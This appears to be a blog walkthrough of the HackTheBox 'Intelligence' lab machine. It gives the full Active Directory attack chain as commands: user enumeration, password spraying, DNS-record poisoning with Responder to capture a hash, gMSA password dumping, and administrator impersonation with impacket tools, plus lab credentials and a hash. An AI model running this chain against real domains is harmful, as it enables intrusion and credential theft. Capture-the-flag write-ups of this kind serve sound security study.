Intelligence HackTheBox Walkthrough | Active Directory

D3athCod3
6 min readJun 15, 2024

--

Scanning

Let’s start scanning using nmap

nmap -p- -sV -sC -A 10.10.10.248

Here we find bunch of open ports and Domain i.e. intelligence.htb. I added domain and server ip inside my /etc/hosts file

Let’s start enumerating

Accessing & Enumerating Port 80

After accessing port 80 we get this web page

After going through whole page i find two pdf files

I downloaded them using wget, but sadly not able to understand file content language. Then i decided extracting file metadata using exiftool

exiftool 2020-01-01-upload.pdf

Here i see a username inside Creator field. I tried verifying this user if it exist or not in AD environment using kerbrute script.

I saved this username inside a file named as user.txt and using kerbrute userenum feature i try bruteforcing this

./kerbrute userenum -v --dc 10.10.10.248 -d intelligence.htb user.txt

And we found this is valid username that means creator hold username.

I did same on second pdf and found other user named as Jose.Williams

I tried finding if any user had preauthentication disabled using impacket-GetNPUsers but found nothing :(

I tried bruteforcing smb password for this user but no luck. Then i tried Enumerating LDAP and DNS but no luck either :(

Then i go back to website and found we can’t directly access /document but we can fuzz more pdf as pdf format is in YYYY-MM-DD-upload.pdf

URL: http://intelligence.htb/documents/

I created a python script that first check if pdf of each month and date exist of not and if exist then it’ll download in my system.

import requests

# Base URL to check the existence of the PDF
base_url = "http://intelligence.htb/documents/"

# Loop through all months (01 to 12)
for month in range(1, 13):
# Format the month to two digits
month_str = f"{month:02d}"

# Loop through all days (01 to 31)
for day in range(1, 32):
# Format the day to two digits
day_str = f"{day:02d}"

# Create the filename
filename = f"2020-{month_str}-{day_str}-upload.pdf"

# Full URL
url = base_url + filename

# Check if the file exists
response = requests.head(url)

if response.status_code == 200:
print(f"File found: {filename}. Downloading...")
# If it exists, download the file
response = requests.get(url)
with open(filename, 'wb') as f:
f.write(response.content)
else:
print(f"File not found: {filename}")

After running this script i got bunch of pdf :( lot of work

Here i decide to extract all usernames from pdf and stored inside a file name user.txt. For doing this instead of exiftool this command use strings on all pdfs and extract all Creator name and stored them inside a file.

cat *.pdf | strings | grep Creator | cut -d '(' -f 2 | cut -d ')' -f 1 | grep -v Tex | grep -v TeX > user.txt

Now i tried finding any user which had preauthentication disable to we can grab it’s TGS ticket using impacket-GetNPUsers

impacket-GetNPUsers  -dc-ip 10.10.10.248 intelligence.htb/ -usersfile user.txt -no-pass

But found none :(

Then i decide to check all pdf content, For making it easy i upload all of them https://smallpdf.com/ so i can see all of them on one page.

After going through all pages i found a pdf which contain cleartext password.

Now we have user list and a password. I tried password spraying using crackmapexec for samba service

crackmapexec smb 10.10.10.248 -u user.txt -p "NewIntelligenceCorpUser9876"

Got a valid username in which we can user found password :)

Using smbclient i list shares of this user

smbclient -L //10.10.10.248 --user Tiffany.Molina

Now using Users share with smbclient and credentials i gain access to smb

smbclient //10.10.10.248/Users --user Tiffany.Molina --password NewIntelligenceCorpUser9876

and inside Desktop i found user.txt flag :)

Then i access IT share and found a script named as downdetector.ps1

i downloaded this powershell script on my local system and read the script content

��# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

The script checks the status of web servers with DNS records starting with “web” and sends an email from Ted Graves User if any of these servers are down.

Here we can perform MITM and grab this user hash using kerbrelayx scritp dnstool.py and responder.

python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'webprooplayer' -d 10.10.14.34 10.10.10.248

Now run responder on tun0 interface and after 5 min you’ll get Ted Graves User hash

sudo responder -I tun0

I crack this hash using john the ripper tool

we now have Ted user password but still unable to logon anywhere :(

didn’t found anything useful in smb too. Then I decided to run bloodhound-python to enumerate the user privileges.

bloodhound-python -c All -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -ns 10.10.10.248 --zip

I uploaded zip file inside bloodhound then i mark Tiffany.Molina & Ted.Graves as owned.

After little bit analysing i found this:

itsupport group have ReadGMSAPassword over the svc_int user little bit search on google get me a github page : https://github.com/micahvandeusen/gMSADumper

I cloned this repository and using this i try to dump svc_init TGT hash

python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb

I got this TGT hash of svc_init

Pass The Ticket (PTT)

After little bit searching i found out a blog that show getTGT.py (a impacket script) that we can use to Request Service Ticket of administrator user.

impacket-getST 'intelligence.htb/svc_int$' -spn WWW/dc.intelligence.htb -hashes ':51e4932f13712047027300f869d07ab6' -impersonate administrator

After trying this i got a error i.e. Clock skew too great.

I search about this on google and found a medium blog that work like charm for me :)

I followed same step and it start working

Steps i follow:

su
timedatectl set-ntp off
rdate -n 10.10.10.248
impacket-getST 'intelligence.htb/svc_int$' -spn WWW/dc.intelligence.htb -hashes ':51e4932f13712047027300f869d07ab6' -impersonate administrator

Then i tried using this with psexec but didn’t work :) stuck again.

Later i found out that impacket had a script name atexec that we can use to remotely execute command for this i export the administrator user service ticket

export KRB5CCNAME=administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache

Then using atexec i execute whoami command

Now replacing whoami with type and root flag location i grab root.txt flag :)

Intelligence Machine Solved Successfully!!

Follow For More: Instagram, LinkedIn

--

--

D3athCod3

D3athCod3 is a CTF team dedicated to honing and showcasing top-tier cybersecurity skills.